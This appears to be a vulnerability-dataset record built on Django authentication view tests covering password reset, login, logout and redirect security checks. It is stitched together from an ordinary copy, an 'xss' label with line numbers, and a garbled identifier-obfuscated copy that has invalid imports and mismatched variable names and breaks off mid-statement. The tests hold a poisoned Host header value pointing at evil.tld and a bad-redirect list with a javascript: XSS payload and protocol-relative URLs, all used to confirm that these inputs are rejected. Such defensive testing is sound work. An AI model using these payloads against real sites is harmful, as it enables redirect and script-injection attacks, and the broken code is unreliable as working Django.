        "Poisoned HTTP_HOST headers can't be used for reset emails on admin views"
        with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
            response = self.client.post('/admin_password_reset/',
                                        {'email': 'staffmember@example.com'},
                                        HTTP_HOST='www.example:dr.frankenstein@evil.tld'
                                        )
            self.assertEqual(response.status_code, 400)
            self.assertEqual(len(mail.outbox), 0)
            self.assertEqual(len(logger_calls), 1)

    def _test_confirm_start(self):
        # Start by creating the email
        self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
        self.assertEqual(len(mail.outbox), 1)
        return self._read_signup_email(mail.outbox[0])

    def _read_signup_email(self, email):
        # Extract the absolute reset URL and its path from the message body.
        urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
        self.assertTrue(urlmatch is not None, "No URL found in sent email")
        return urlmatch.group(), urlmatch.groups()[0]

    def test_confirm_valid(self):
        url, path = self._test_confirm_start()
        response = self.client.get(path)
        # redirect to a 'complete' page:
        self.assertContains(response, "Please enter your new password")

    def test_confirm_invalid(self):
        url, path = self._test_confirm_start()
        # Let's munge the token in the path, but keep the same length,
        # in case the URLconf will reject a different length.
        path = path[:-5] + ("0" * 4) + path[-1]
        response = self.client.get(path)
        self.assertContains(response, "The password reset link was invalid")

    def test_confirm_invalid_user(self):
        # Ensure that we get a 200 response for a non-existent user, not a 404
        response = self.client.get('/reset/123456/1-1/')
        self.assertContains(response, "The password reset link was invalid")

    def test_confirm_overflow_user(self):
        # Ensure that we get a 200 response for a base36 user id that overflows int
        response = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
        self.assertContains(response, "The password reset link was invalid")

    def test_confirm_invalid_post(self):
        # Same as test_confirm_invalid, but trying
        # to do a POST instead.
        url, path = self._test_confirm_start()
        path = path[:-5] + ("0" * 4) + path[-1]
        self.client.post(path, {
            'new_password1': 'anewpassword',
            'new_password2': ' anewpassword',
        })
        # Check the password has not been changed
        u = User.objects.get(email='staffmember@example.com')
        self.assertTrue(not u.check_password("anewpassword"))

    def test_confirm_complete(self):
        url, path = self._test_confirm_start()
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2': 'anewpassword'})
        # Check the password has been changed
        u = User.objects.get(email='staffmember@example.com')
        self.assertTrue(u.check_password("anewpassword"))
        # Check we can't use the link again
        response = self.client.get(path)
        self.assertContains(response, "The password reset link was invalid")

    def test_confirm_different_passwords(self):
        url, path = self._test_confirm_start()
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2': 'x'})
        self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])

    def test_reset_redirect_default(self):
        response = self.client.post('/password_reset/',
                                    {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/password_reset/done/')

    def test_reset_custom_redirect(self):
        # View variant configured with a literal post_reset_redirect URL.
        response = self.client.post('/password_reset/custom_redirect/',
                                    {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/custom/')

    def test_reset_custom_redirect_named(self):
        # View variant whose post_reset_redirect is a URL-pattern name.
        response = self.client.post('/password_reset/custom_redirect/named/',
                                    {'email': 'staffmember@example.com'})
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/password_reset/')

    def test_confirm_redirect_default(self):
        url, path = self._test_confirm_start()
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2': 'anewpassword'})
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/reset/done/')

    def test_confirm_redirect_custom(self):
        url, path = self._test_confirm_start()
        path = path.replace('/reset/', '/reset/custom/')
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2': 'anewpassword'})
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/custom/')

    def test_confirm_redirect_custom_named(self):
        url, path = self._test_confirm_start()
        path = path.replace('/reset/', '/reset/custom/named/')
        response = self.client.post(path, {'new_password1': 'anewpassword',
                                           'new_password2': 'anewpassword'})
        self.assertEqual(response.status_code, 302)
        self.assertURLEqual(response.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CustomUserPasswordResetTest(AuthViewsTestCase):
fixtures = ['custom_user.json']
def _test_confirm_start(self):
# Start by creating the email
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid_custom_user(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertContains(response, "Please enter your new password")
@skipIfCustomUser
class ChangePasswordTest(AuthViewsTestCase):
def fail_login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password,
})
self.assertFormError(response, AuthenticationForm.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})
def logout(self):
self.client.get('/logout/')
def test_password_change_fails_with_invalid_old_password(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertFormError(response, PasswordChangeForm.error_messages['password_incorrect'])
def test_password_change_fails_with_mismatched_passwords(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
})
self.assertFormError(response, SetPasswordForm.error_messages['password_mismatch'])
def test_password_change_succeeds(self):
self.login()
self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.fail_login()
self.login(password='password1')
def test_password_change_done_succeeds(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_change/done/')
@override_settings(LOGIN_URL='/login/')
def test_password_change_done_fails(self):
response = self.client.get('/password_change/done/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/?next=/password_change/done/')
def test_password_change_redirect_default(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_change/done/')
def test_password_change_redirect_custom(self):
self.login()
response = self.client.post('/password_change/custom/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/custom/')
def test_password_change_redirect_custom_named(self):
self.login()
response = self.client.post('/password_change/custom/named/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
@skipIfCustomUser
class LoginTest(AuthViewsTestCase):
def test_current_site_in_context_after_login(self):
response = self.client.get(reverse('login'))
self.assertEqual(response.status_code, 200)
if Site._meta.installed:
site = Site.objects.get_current()
self.assertEqual(response.context['site'], site)
self.assertEqual(response.context['site_name'], site.name)
else:
self.assertIsInstance(response.context['site'], RequestSite)
self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def test_security_check(self, password='password'):
login_url = reverse('login')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
response = self.client.post(nasty_url, {
'username': 'testclient',
'password': password,
})
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response.url,
"%s should be blocked" % bad_url)
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/url%20with%20spaces/'): # see ticket #12534
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
response = self.client.post(safe_url, {
'username': 'testclient',
'password': password,
})
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response.url,
"%s should be allowed" % good_url)
def test_login_form_contains_request(self):
# 15198
self.client.post('/custom_requestauth_login/', {
'username': 'testclient',
'password': 'password',
}, follow=True)
# the custom authentication form used by this login asserts
# that a request is passed to the form successfully.
def test_login_csrf_rotate(self, password='password'):
"""
Makes sure that a login rotates the currently-used CSRF token.
"""
# Do a GET to establish a CSRF token
# TestClient isn't used here as we're testing middleware, essentially.
req = HttpRequest()
CsrfViewMiddleware().process_view(req, login_view, (), {})
req.META["CSRF_COOKIE_USED"] = True
resp = login_view(req)
resp2 = CsrfViewMiddleware().process_response(req, resp)
csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
token1 = csrf_cookie.coded_value
# Prepare the POST request
req = HttpRequest()
req.COOKIES[settings.CSRF_COOKIE_NAME] = token1
req.method = "POST"
req.POST = {'username': 'testclient', 'password': password, 'csrfmiddlewaretoken': token1}
req.REQUEST = req.POST
# Use POST request to log in
SessionMiddleware().process_request(req)
CsrfViewMiddleware().process_view(req, login_view, (), {})
req.META["SERVER_NAME"] = "testserver" # Required to have redirect work in login view
req.META["SERVER_PORT"] = 80
req.META["CSRF_COOKIE_USED"] = True
resp = login_view(req)
resp2 = CsrfViewMiddleware().process_response(req, resp)
csrf_cookie = resp2.cookies.get(settings.CSRF_COOKIE_NAME, None)
token2 = csrf_cookie.coded_value
# Check the CSRF token switched
self.assertNotEqual(token1, token2)
@skipIfCustomUser
class LoginURLSettings(AuthViewsTestCase):
"""Tests for settings.LOGIN_URL."""
def assertLoginURLEquals(self, url, parse_qs=False):
response = self.client.get('/login_required/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, url, parse_qs=parse_qs)
@override_settings(LOGIN_URL='/login/')
def test_standard_login_url(self):
self.assertLoginURLEquals('/login/?next=/login_required/')
@override_settings(LOGIN_URL='login')
def test_named_login_url(self):
self.assertLoginURLEquals('/login/?next=/login_required/')
@override_settings(LOGIN_URL='http://remote.example.com/login')
def test_remote_login_url(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'http://remote.example.com/login?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@override_settings(LOGIN_URL='https:///login/')
def test_https_login_url(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'https:///login/?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@override_settings(LOGIN_URL='/login/?pretty=1')
def test_login_url_with_querystring(self):
self.assertLoginURLEquals('/login/?pretty=1&next=/login_required/', parse_qs=True)
@override_settings(LOGIN_URL='http://remote.example.com/login/?next=/default/')
def test_remote_login_url_with_next_querystring(self):
quoted_next = urlquote('http://testserver/login_required/')
expected = 'http://remote.example.com/login/?next=%s' % quoted_next
self.assertLoginURLEquals(expected)
@skipIfCustomUser
class LoginRedirectUrlTest(AuthViewsTestCase):
"""Tests for settings.LOGIN_REDIRECT_URL."""
def assertLoginRedirectURLEqual(self, url):
response = self.login()
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, url)
def test_default(self):
self.assertLoginRedirectURLEqual('/accounts/profile/')
@override_settings(LOGIN_REDIRECT_URL='/custom/')
def test_custom(self):
self.assertLoginRedirectURLEqual('/custom/')
@override_settings(LOGIN_REDIRECT_URL='password_reset')
def test_named(self):
self.assertLoginRedirectURLEqual('/password_reset/')
@override_settings(LOGIN_REDIRECT_URL='http://remote.example.com/welcome/')
def test_remote(self):
self.assertLoginRedirectURLEqual('http://remote.example.com/welcome/')
@skipIfCustomUser
class LogoutTest(AuthViewsTestCase):
def confirm_logged_out(self):
self.assertTrue(SESSION_KEY not in self.client.session)
def test_logout_default(self):
"Logout without next_page option renders the default template"
self.login()
response = self.client.get('/logout/')
self.assertContains(response, 'Logged out')
self.confirm_logged_out()
def test_14377(self):
# Bug 14377
self.login()
response = self.client.get('/logout/')
self.assertTrue('site' in response.context)
def test_logout_with_overridden_redirect_url(self):
# Bug 11223
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
response = self.client.get('/logout/next_page/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/')
self.confirm_logged_out()
def test_logout_with_next_page_specified(self):
"Logout with next_page option given redirects to specified resource"
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
self.confirm_logged_out()
def test_logout_with_redirect_argument(self):
"Logout with query string redirects to specified resource"
self.login()
response = self.client.get('/logout/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/login/')
self.confirm_logged_out()
def test_logout_with_custom_redirect_argument(self):
"Logout with custom query string redirects to specified resource"
self.login()
response = self.client.get('/logout/custom_query/?follow=/somewhere/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/somewhere/')
self.confirm_logged_out()
def test_logout_with_named_redirect(self):
"Logout resolves names or URLs passed as next_page."
self.login()
response = self.client.get('/logout/next_page/named/')
self.assertEqual(response.status_code, 302)
self.assertURLEqual(response.url, '/password_reset/')
self.confirm_logged_out()
def test_security_check(self, password='password'):
logout_url = reverse('logout')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com',
'javascript:alert("XSS")'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
self.login()
response = self.client.get(nasty_url)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response.url,
"%s should be blocked" % bad_url)
self.confirm_logged_out()
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'HTTPS:///',
'//testserver/',
'/url%20with%20spaces/'): # see ticket #12534
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urlquote(good_url),
}
self.login()
response = self.client.get(safe_url)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response.url,
"%s should be allowed" % good_url)
self.confirm_logged_out()
@skipIfCustomUser
@override_settings(
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class ChangelistTests(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls_admin'
def setUp(self):
# Make me a superuser before logging in.
User.objects.filter(username='testclient').update(is_staff=True, is_superuser=True)
self.login()
self.admin = User.objects.get(pk=1)
def get_user_data(self, user):
return {
'username': user.username,
'password': user.password,
'email': user.email,
'is_active': user.is_active,
'is_staff': user.is_staff,
'is_superuser': user.is_superuser,
'last_login_0': user.last_login.strftime('%Y-%m-%d'),
'last_login_1': user.last_login.strftime('%H:%M:%S'),
'initial-last_login_0': user.last_login.strftime('%Y-%m-%d'),
'initial-last_login_1': user.last_login.strftime('%H:%M:%S'),
'date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
'date_joined_1': user.date_joined.strftime('%H:%M:%S'),
'initial-date_joined_0': user.date_joined.strftime('%Y-%m-%d'),
'initial-date_joined_1': user.date_joined.strftime('%H:%M:%S'),
'first_name': user.first_name,
'last_name': user.last_name,
}
# #20078 - users shouldn't be allowed to guess password hashes via
# repeated password__startswith queries.
def test_changelist_disallows_password_lookups(self):
# A lookup that tries to filter on password isn't OK
with patch_logger('django.security.DisallowedModelAdminLookup', 'error') as logger_calls:
response = self.client.get('/admin/auth/user/?password__startswith=sha1$')
self.assertEqual(response.status_code, 400)
self.assertEqual(len(logger_calls), 1)
def test_user_change_email(self):
data = self.get_user_data(self.admin)
data['email'] = 'new_' + data['email']
response = self.client.post('/admin/auth/user/%s/' % self.admin.pk, data)
self.assertRedirects(response, '/admin/auth/user/')
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'Changed email.')
def test_user_not_change(self):
response = self.client.post('/admin/auth/user/%s/' % self.admin.pk,
self.get_user_data(self.admin)
)
self.assertRedirects(response, '/admin/auth/user/')
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'No fields changed.')
def test_user_change_password(self):
response = self.client.post('/admin/auth/user/%s/password/' % self.admin.pk, {
'password1': 'password1',
'password2': 'password1',
})
self.assertRedirects(response, '/admin/auth/user/%s/' % self.admin.pk)
row = LogEntry.objects.latest('id')
self.assertEqual(row.change_message, 'Changed password.')
self.logout()
self.login(password='password1')
| xss | {
"code": [
" '//example.com'):",
" '//example.com'):"
],
"line_no": [
449,
664
]
} | {
"code": [
" '//example.com',",
" 'HTTPS:///',",
" '//example.com',",
" 'javascript:alert(\"XSS\")'):",
" 'HTTPS:///',"
],
"line_no": [
449,
471,
666,
667,
686
]
} | import itertools
import os
import re
try:
from urllib.parse import .urlparse, ParseResult
except ImportError: # Python 2
from urlparse import .urlparse, ParseResult
from django.conf import global_settings, VAR_23
from django.contrib.sites.models import Site, RequestSite
from django.contrib.admin.models import LogEntry
from django.contrib.auth.models import User
from django.core import mail
from django.core.urlresolvers import reverse, NoReverseMatch
from django.http import QueryDict, HttpRequest
from django.utils.encoding import force_text
from django.utils.http import .urlquote
from django.utils._os import .upath
from django.test import TestCase
from django.test.utils import override_settings, patch_logger
from django.middleware.csrf import CsrfViewMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import (AuthenticationForm, PasswordChangeForm,
SetPasswordForm)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.contrib.auth.views import .login as login_view
@override_settings(
LANGUAGES=(
('en', 'English'),
),
LANGUAGE_CODE='en',
TEMPLATE_LOADERS=global_settings.TEMPLATE_LOADERS,
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(upath(__file__)), 'templates'),
),
USE_TZ=False,
PASSWORD_HASHERS=('django.contrib.auth.hashers.SHA1PasswordHasher',),
)
class CLASS_0(TestCase):
VAR_0 = ['authtestdata.json']
VAR_1 = 'django.contrib.auth.tests.urls'
def FUNC_0(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertTrue(SESSION_KEY in self.client.session)
return VAR_3
def FUNC_1(self):
VAR_3 = self.client.get('/admin/FUNC_1/')
self.assertEqual(VAR_3.status_code, 200)
self.assertTrue(SESSION_KEY not in self.client.session)
def FUNC_2(self, VAR_3, VAR_4):
VAR_10 = list(itertools.chain(*VAR_3.context['form'].errors.values()))
self.assertIn(force_text(VAR_4), VAR_10)
def FUNC_3(self, VAR_5, VAR_6, VAR_7=False):
VAR_11 = ParseResult._fields
for attr, VAR_32, VAR_33 in zip(VAR_11, urlparse(VAR_5), urlparse(VAR_6)):
if VAR_7 and attr == 'query':
VAR_32, VAR_33 = QueryDict(VAR_32), QueryDict(VAR_33)
if VAR_32 and VAR_33 and VAR_32 != VAR_33:
self.fail("%r != %r (%s doesn't match)" % (VAR_5, VAR_6, attr))
@skipIfCustomUser
class CLASS_1(CLASS_0):
VAR_1 = 'django.contrib.auth.urls'
VAR_12 = [
('login', [], {}),
('logout', [], {}),
('password_change', [], {}),
('password_change_done', [], {}),
('password_reset', [], {}),
('password_reset_done', [], {}),
('password_reset_confirm', [], {
'uidb64': 'aaaaaaa',
'token': '1111-aaaaa',
}),
('password_reset_complete', [], {}),
]
for name, args, kwargs in VAR_12:
try:
reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.fail("Reversal of VAR_5 named '%s' failed with NoReverseMatch" % name)
@skipIfCustomUser
class CLASS_2(CLASS_0):
def FUNC_5(self):
VAR_3 = self.client.get('/password_reset/')
self.assertEqual(VAR_3.status_code, 200)
VAR_3 = self.client.post('/password_reset/', {'email': 'not_a_real_email@VAR_8.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 0)
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
self.assertFalse(mail.outbox[0].message().is_multipart())
def FUNC_7(self):
VAR_3 = self.client.post('/password_reset/html_email_template/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
VAR_13 = mail.outbox[0].message()
self.assertEqual(len(VAR_13.get_payload()), 2)
self.assertTrue(VAR_13.is_multipart())
self.assertEqual(VAR_13.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(VAR_13.get_payload(1).get_content_type(), 'text/html')
self.assertTrue('<html>' not in VAR_13.get_payload(0).get_payload())
self.assertTrue('<html>' in VAR_13.get_payload(1).get_payload())
VAR_3 = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(VAR_23.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
with patch_logger('django.security.DisallowedHost', 'error') as logger_calls:
VAR_3 = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertEqual(VAR_3.status_code, 400)
self.assertEqual(len(mail.outbox), 0)
self.assertEqual(len(logger_calls), 1)
def FUNC_12(self):
self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_14(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
def FUNC_15(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_16(self):
VAR_3 = self.client.get('/reset/123456/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_17(self):
VAR_3 = self.client.get('/reset/zzzzzzzzzzzzz/1-1/')
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_18(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path[:-5] + ("0" * 4) + VAR_15[-1]
self.client.post(VAR_15, {
'new_password1': 'anewpassword',
'new_password2': ' anewpassword',
})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(not VAR_16.check_password("anewpassword"))
def FUNC_19(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
VAR_16 = User.objects.get(VAR_8='staffmember@example.com')
self.assertTrue(VAR_16.check_password("anewpassword"))
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "The VAR_2 reset link was invalid")
def FUNC_20(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'x'})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_21(self):
VAR_3 = self.client.post('/password_reset/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/done/')
def FUNC_22(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_23(self):
VAR_3 = self.client.post('/password_reset/custom_redirect/named/',
{'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
def FUNC_24(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/reset/done/')
def FUNC_25(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_26(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_15 = path.replace('/reset/', '/reset/custom/named/')
VAR_3 = self.client.post(VAR_15, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@override_settings(AUTH_USER_MODEL='auth.CustomUser')
class CLASS_3(CLASS_0):
VAR_0 = ['custom_user.json']
def FUNC_12(self):
VAR_3 = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(VAR_3.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def FUNC_13(self, VAR_8):
VAR_14 = re.search(r"https?://[^/]*(/.*reset/\S*)", VAR_8.body)
self.assertTrue(VAR_14 is not None, "No URL found in sent email")
return VAR_14.group(), VAR_14.groups()[0]
def FUNC_27(self):
VAR_5, VAR_15 = self._test_confirm_start()
VAR_3 = self.client.get(VAR_15)
self.assertContains(VAR_3, "Please enter your new password")
@skipIfCustomUser
class CLASS_4(CLASS_0):
def FUNC_28(self, VAR_2='password'):
VAR_3 = self.client.post('/FUNC_0/', {
'username': 'testclient',
'password': VAR_2,
})
self.assertFormError(VAR_3, AuthenticationForm.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})
def FUNC_1(self):
self.client.get('/FUNC_1/')
def FUNC_29(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertFormError(VAR_3, PasswordChangeForm.error_messages['password_incorrect'])
def FUNC_30(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
})
self.assertFormError(VAR_3, SetPasswordForm.error_messages['password_mismatch'])
def FUNC_31(self):
self.login()
self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.fail_login()
self.login(VAR_2='password1')
def FUNC_32(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
@override_settings(LOGIN_URL='/FUNC_0/')
def FUNC_33(self):
VAR_3 = self.client.get('/password_change/done/')
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/FUNC_0/?next=/password_change/done/')
def FUNC_34(self):
self.login()
VAR_3 = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_change/done/')
def FUNC_35(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/custom/')
def FUNC_36(self):
self.login()
VAR_3 = self.client.post('/password_change/custom/named/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
})
self.assertEqual(VAR_3.status_code, 302)
self.assertURLEqual(VAR_3.url, '/password_reset/')
@skipIfCustomUser
class CLASS_5(CLASS_0):
def FUNC_37(self):
VAR_3 = self.client.get(reverse('login'))
self.assertEqual(VAR_3.status_code, 200)
if Site._meta.installed:
VAR_29 = Site.objects.get_current()
self.assertEqual(VAR_3.context['site'], VAR_29)
self.assertEqual(VAR_3.context['site_name'], VAR_29.name)
else:
self.assertIsInstance(VAR_3.context['site'], RequestSite)
self.assertTrue(isinstance(VAR_3.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def FUNC_38(self, VAR_2='password'):
VAR_17 = reverse('login')
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
VAR_30 = '%(VAR_5)s?%(next)s=%(bad_url)s' % {
'url': VAR_17,
'next': REDIRECT_FIELD_NAME,
'bad_url': urlquote(bad_url),
}
VAR_3 = self.client.post(VAR_30, {
